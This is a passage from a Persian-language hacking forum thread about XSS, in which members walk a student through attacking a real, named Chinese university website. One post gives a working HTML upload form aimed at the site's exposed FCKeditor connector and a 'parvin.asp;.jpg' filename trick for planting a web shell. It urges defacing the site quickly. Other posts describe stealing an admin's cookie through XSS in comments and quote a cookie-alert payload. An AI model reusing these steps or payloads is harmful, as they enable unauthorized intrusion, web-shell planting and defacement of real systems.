• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: اموزش XSS و کدهای ان
حالت موضوعی
#11
الان من اين ادرس ها رو باز ميكنم كه هيچ اتفاقي نميوفته.
چطوري ميشه با اين باگ يه تصوير دلخواه گذاشت بذاريم تو سايت
 
پاسخ
#12
ببینید باید باگ xss تو قسمت نظرات باشه اون که من مثال زدم یه تست بود توی قسمت نظرات باید باشه وقتی ادمین پیغامو دید کوکیشو زد نه اینجوری
این سایت باگ های خیلی بیشتر از xss داره !
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#13
تو باگ xss ميشه تو اسكريپت ادرس يه تصوير كه قبلا يه جاي ديگه اپلود كرديم رو داد؟
 
پاسخ
#14
اره حتی میشه هدایتش کرد به یه صفحه دیگه
البته لینک باید مدیر سایت ببینه اونم توضیح میدم
سوالهای دیگه رو تو بخش دیگه بپرسید اگر یر xss دارید.
تارگت رو که دادید اسکن کنید خیلی باگ داره
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#15
اینم از سایت شما
http://jjs.uestc.edu.cn/upload/file/3014...1917_n.jpg

خوابم میاد حوصله ترتیبشو دادن ندارم
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#16
ممنون . میشه بگید این کار رو چطوری کردید؟ با کدوم باگش ؟ من اسکنش کردم و 7 تا باگ داشت. با کدومش شد عکستون رو بریزید؟ روشش رو هم بگید. ببخشید 3 نمره داره باید روشش رو بلد باشم .جبران میکنم
 
پاسخ
#17
چطوری جبران میکنی ؟ :d (شوخی)
وب سایتو اسکن کردم یه fckeditor داشت لعنتی سایت که نبود همه fckeditor هاش خراب بود.
بعد اگر توجه کنی به اسکنر ادرس زیر رو میده
کد:
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/

بعد از طریق خود fckeditor هم نمیشد چیزی اپلود کنی پس راه حل چی بود ؟
به کد زیر توجه کن
notepad رو باز کن کدهای زیر رو داخلش کپی کن و به اسم parvin.html ذخیره کن

کد :

کد:
<strong>parsicoders File Uploader Exploit In FCKeditor</strong>
<form enctype="multipart/form-data" action="
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
حالا فایل parvin.html رو اجرا کن !

حالا میتونی شل و یا عکستو اپلود کنی باید یه شل پیدا کنی که شناسایی نشه و پاک نشه اپلود کن و دیفیس بزن حالشو ببر

کارشو زودی تمام کن تا کس دیگه ترتیبشو نداده این سایت ها افت کلاسه که هکشون کنم :-)

هر وقت خواستی shell اپلود کنی اسمشو به این نام تغییر بده

کد:
parvin.asp;.jpg


فایل شل رو وقتی اپلود کردی تو این پوشه پیدا کن و اجراش کن
کد:
http://jjs.uestc.edu.cn/upload/file

به همین راحتی و به همین باحالی :P


گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#18
مرسي
کد:
http://jjs.uestc.edu.cn/upload/file/PPPP.JPG
 
پاسخ
#19
(01-23-2012، 03:29 PM)parvin نوشته: مرسي
کد:
http://jjs.uestc.edu.cn/upload/file/PPPP.JPG

استادتون همین سایته رو داده ؟
اگر داده همین کافیه چون fckeditor اپلودش رو bypass شده
بگرد یه شل پیدا کن کلا دیفیس بزن :d

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#20
امین جان اگه به جای ساختن اون فای و اپلودش از این دستور استفاده کنیم نتیجه فرق میکنه!
کد:
<script>alert(document.cookie)</script>
اگه نه حس میکنم این ورش خیلی راحتتر باشه!
 
پاسخ
  


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  اموزش DDOS Amin_Mansouri 14 38,634 01-06-2017، 02:16 PM
آخرین ارسال: taktok
  اموزش هک مودم ADSL Amin_Mansouri 7 20,854 09-06-2016، 12:36 AM
آخرین ارسال: A.S
  کلیپ اموزش حرفه ای sql injection Amin_Mansouri 0 4,260 06-07-2012، 11:58 PM
آخرین ارسال: Amin_Mansouri
  اموزش حمله Sql injection بصورت انلاین Amin_Mansouri 0 6,156 06-05-2012، 11:28 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 3 مهمان